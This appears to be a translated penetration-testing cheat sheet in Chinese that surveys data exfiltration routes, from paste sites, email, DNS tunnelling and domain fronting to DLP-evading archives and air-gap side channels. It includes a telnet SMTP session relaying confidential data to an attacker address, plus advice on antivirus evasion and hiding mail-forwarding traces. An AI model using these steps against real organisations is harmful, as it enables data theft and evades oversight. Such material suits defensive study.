數(shù)據(jù)竊取是針對(duì)組織攻擊鏈中的最后一個(gè)階段。攻擊者竊取數(shù)據(jù)的技術(shù)可謂花樣百出，網(wǎng)上也有大量關(guān)于數(shù)據(jù)竊取方面的技術(shù)文檔以及工具。本文的目的就是盡可能的將這些技術(shù)整合起來，以作為大家日后滲透測試時(shí)的一個(gè)CheatSheet使用。

[[243369]]

工欲善其事必先利其器，防范數(shù)據(jù)竊取必須先熟悉其使用的手段。文中所提及的大多數(shù)技術(shù)涉及直接的內(nèi)部到外部數(shù)據(jù)竊取。

Web

許多企業(yè)都沒有在合適的地方設(shè)置任何類型的web代理這對(duì)于攻擊者而言將會(huì)是個(gè)很好的機(jī)會(huì)。

Anon paste站點(diǎn)例如pastebin甚至是github，都為我們提供了一個(gè)數(shù)據(jù)竊取的簡易通道。許多技術(shù)組織通常都會(huì)允許Github的使用。

如果有代理和過濾，你可能就需要花點(diǎn)心思了，但許多常見網(wǎng)站都會(huì)允許使用Dropbox，Google Drive和Box等，特別是那些有云外包服務(wù)的企業(yè)。

許多站點(diǎn)出于某些原因并未啟用TLS，這很容易導(dǎo)致中間人攻擊。因此，如果你的站點(diǎn)沒有啟用https，那么可以使用用Let’s Encrypt為你的站點(diǎn)免費(fèi)加密。

即使啟用了類似Websense這樣的功能，很多類別也不能用于完整的TLS檢查——比如財(cái)務(wù)和醫(yī)療——雇員隱私。許多分類系統(tǒng)允許你根據(jù)自己的實(shí)際情況設(shè)置分類，因此攻擊者只要做好預(yù)先計(jì)劃，例如創(chuàng)建一個(gè)醫(yī)療站點(diǎn)就可能輕松繞過過濾機(jī)制。

Flickr和YouTube是否可以訪問？ 如果可以的話，則可以使用這些服務(wù)暫存相對(duì)較大的文件，包括使用隱寫術(shù)。

也許你的企業(yè)擁有自己的可從Internet訪問的Web服務(wù)器。那么你可以想辦法拿下其中的一臺(tái)，來作為你進(jìn)一步滲透的中轉(zhuǎn)站。

Email

你是否可以訪問一些主要的網(wǎng)絡(luò)郵件提供商 – 例如Gmail，Outlook.com等？如果你的目標(biāo)企業(yè)有外包到Office 365或GSuite（檢查其MX或郵件頭），則更有可能實(shí)現(xiàn)此目的。

出站SMTP/POP3/IMAP是否可用。檢查加密以及未加密的端口 – 25/465/587,110/999,143/993。

是否存在錯(cuò)誤配置的郵件中繼？是否可以通過欺騙內(nèi)部地址來中繼到外部地址？（這也可在內(nèi)網(wǎng)釣魚時(shí)用來繞過message hygiene過濾器 ）

#telnet internal.smtp.local 25 
HELO attacker 
MAIL FROM:<attacker@domain.com> 
RCPT TO:<attacker@attackerdomain.com> 
DATA 
Here is lots of confidential data 
. 
QUIT 

如果郵箱遭到入侵（后釣魚利用），攻擊者可以將Outlook中的自動(dòng)轉(zhuǎn)發(fā)規(guī)則設(shè)置為他們選擇的外部地址。通常這對(duì)于高價(jià)值目標(biāo)非常有用。之后，我們可以使用相同的規(guī)則來刪除已發(fā)送的項(xiàng)目，以覆蓋留下的痕跡。

Malware

Meterpreter是一種先進(jìn)的，可動(dòng)態(tài)擴(kuò)展的有效載荷，它使用內(nèi)存中的DLL注入階段，并在運(yùn)行時(shí)通過網(wǎng)絡(luò)擴(kuò)展。它通過stager套接字進(jìn)行通信并提供全面的客戶端Ruby API。它包含命令歷史記錄，制表符完成，頻道等。https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

要盡可能的避免殺軟和網(wǎng)絡(luò)入侵檢測，你可以使用Metasploit中提供的編碼器（例如/shikata_ga_nai）。還有就是盡量不要將正在使用的payload，上傳到像VirusTotal這類的在線病毒掃描網(wǎng)站。因?yàn)橐坏┥蟼髂愕膒ayload就會(huì)被分享給所有的AV公司，并會(huì)在短時(shí)間內(nèi)被殺毒軟件查殺。https://www.offensive-security.com/metasploit-unleashed/msfencode/

協(xié)議濫用

FTP/SSH/SCP/SFTP可能被允許出站，因?yàn)樗鼈兘?jīng)常被用作數(shù)據(jù)交換協(xié)議?？蛻舳斯ぞ咭部梢栽谙到y(tǒng)上隨時(shí)使用，而無需下載其他二進(jìn)制文件。

DNS Tunneling，是隱蔽信道的一種，通過將其他協(xié)議封裝在DNS協(xié)議中傳輸建立通信。因?yàn)樵谖覀兊木W(wǎng)絡(luò)世界中DNS是一個(gè)必不可少的服務(wù)，所以大部分防火墻和入侵檢測設(shè)備很少會(huì)過濾DNS流量。這里推薦大家可以使用dnscat2。

一些IDS/IDP現(xiàn)在能夠發(fā)現(xiàn)DNS隧道，但經(jīng)常錯(cuò)過通過DNS TXT記錄發(fā)送的數(shù)據(jù)。我們制作了一個(gè)工具你可以通過它來提供文件：https://github.com/pentestpartners/Uninvited-Guest，還有一個(gè)早期的版本：https://github.com/pentestpartners/DNSTXT-encoder。

你可以嘗試原始TCP套接字?？赡躀CMP被允許出站（它是一種非常實(shí)用的診斷工具，在IPv6中很重要）- 但它很慢。https://github.com/sensepost/DET

我們可以使用secret_sender操縱IP數(shù)據(jù)包，通過其中一個(gè)協(xié)議（TCMP Echo Request，TCP SYN或UDP）發(fā)送從命令行接受的消息，將數(shù)據(jù)泄露到服務(wù)器上。因?yàn)樗雌饋硐袷欠?wù)器的正常數(shù)據(jù)包，因此它不會(huì)引起任何的懷疑。

Old-school port knocking（端口敲門）也是一種選擇：https://www.sans.org/reading-room/whitepapers/covert/portknockout-data-exfiltration-port-knocking-udp-37307

像bittorrent這樣的P2P協(xié)議是否可用？

如果HTTPS檢查沒有對(duì)外部和內(nèi)部名稱做匹配性檢查，那么可以嘗試通過Tor和domain fronting（域前置）來繞過過濾器。https://blog.didierstevens.com/2018/01/20/quickpost-data-exfiltration-with-tor-browser-and-domain-fronting/

許多即時(shí)消息協(xié)議，如Skype，F(xiàn)acebook Messenger和IRC也可以被利用。就拿我當(dāng)前所在的企業(yè)來說，我們使用的是Skype for Business并且還啟用了federation。https://www.sans.org/reading-room/whitepapers/covert/skype-data-exfiltration-34560

NTP和BGP協(xié)議通常也被允許，可以濫用它們來泄露數(shù)據(jù)。https://www.darknet.org.uk/2016/11/pyexfil-python-data-exfiltration-tools/

遠(yuǎn)程桌面通常可用于映射磁盤和剪貼板，即便被限制，我們也可以使用PTP Rat通過顯示器像素值來泄露數(shù)據(jù)。

X509證書可以被嵌入到二進(jìn)制數(shù)據(jù)中，因此可用于傳輸數(shù)據(jù)。https://github.com/fideliscyber/x509

Internal Staging

WMI調(diào)用可用于啟動(dòng)傳輸，設(shè)置ADS或采用卷影拷貝來隱藏staging系統(tǒng)上的數(shù)據(jù)。https://github.com/secabstraction/WmiSploit

Windows BITS可用于傳輸調(diào)度或涓流傳輸信息，以避免觸發(fā)“top talkers”觸發(fā)器。

文件類型

對(duì)于一些安裝了DLP（數(shù)據(jù)泄露防護(hù)系統(tǒng)）的企業(yè)，我們可以嘗試將數(shù)據(jù)封裝在以下文件類型來繞過DLP：

• Zip
• 加密 (AES) Zip
• 深度嵌套 Zip（許多系統(tǒng)會(huì)在10-100層之后停止掃描，以避免Zip炸彈） 
• 7zip
• RAR
• CAB
• Tar (+/- gzip)
• WIM image

物理

如果攻擊者或惡意的內(nèi)部工作人員具有物理訪問權(quán)限，那么我們又該怎么做？

檢查筆記本USB插口是否已鎖定，MP3播放器和智能手機(jī)。是否已設(shè)置僅允許授權(quán)USB連接選項(xiàng)。

可以將數(shù)據(jù)保存在CD和DVD中，相較于USB它們更難以泄露數(shù)據(jù)。

筆記本上的資產(chǎn)貼紙，是否有任何泄露信息？便攜式設(shè)備是否具有完全的磁盤加密？垃圾箱或是在eBay上是否有處理不當(dāng)?shù)臋C(jī)器？

許多企業(yè)都擁有自己的打印機(jī)，打印機(jī)的功能也非常的齊全，例如檢索之前的打印任務(wù)，甚至可以通過傳真線傳輸數(shù)據(jù)。http://seclists.org/bugtraq/2016/Sep/54

公司的Wi-Fi是否安全？是否使用了不安全WPA-PSK加密。訪客Wi-Fi網(wǎng)絡(luò)是否與企業(yè)主要網(wǎng)絡(luò)充分隔離？企業(yè)系統(tǒng)是否被允許連接到訪客Wi-Fi？

攻擊者是否可以利用弱邊緣端口安全性在網(wǎng)絡(luò)上植入設(shè)備，例如具有自己的蜂窩帶外命令連接的Raspberry Pi？

網(wǎng)絡(luò)攝像頭

手機(jī)

硬拷貝

隔離網(wǎng)絡(luò)

在網(wǎng)絡(luò)隔離的情況下，可以針對(duì)藍(lán)牙設(shè)備發(fā)起攻擊，例如控制設(shè)備或在設(shè)備范圍內(nèi)傳播惡意軟件等。https://blog.malwarebytes.com/cybercrime/2017/09/blueborne-bluetooths-airborne-influenza/

PC揚(yáng)聲器：主要利用特定的音頻芯片功能，將輸出音頻插孔轉(zhuǎn)換成輸入插孔，從而將連接的揚(yáng)聲器有效地轉(zhuǎn)換為（非傳統(tǒng)）麥克風(fēng)。感染air-gapped計(jì)算機(jī)的惡意軟件可以將本地存儲(chǔ)的文件轉(zhuǎn)換成音頻信號(hào)，并通過連接的揚(yáng)聲器、耳機(jī)或耳塞將它們傳送到附近的另一臺(tái)計(jì)算機(jī)設(shè)備。具體可參考：https://thehackernews.com/2018/03/air-gap-computer-hacking.html

LED燈：硬盤上的LED指示燈也是個(gè)很好的突破口，它每秒最多能閃爍6000次。因此，黑客可以借助這些閃爍遠(yuǎn)程獲取數(shù)據(jù)。https://www.wired.com/2017/02/malware-sends-stolen-data-drone-just-pcs-blinking-led/

磁：ODINI和MAGNETO攻擊可以利用計(jì)算機(jī)處理器產(chǎn)生的磁信號(hào)來竊取數(shù)據(jù)。磁信號(hào)可以通過讀寫硬盤驅(qū)動(dòng)來產(chǎn)生。由于該攻擊為低頻磁場，因此可以繞過法拉第屏蔽。

電力線：通過電力線從隔離計(jì)算機(jī)中提取數(shù)據(jù)。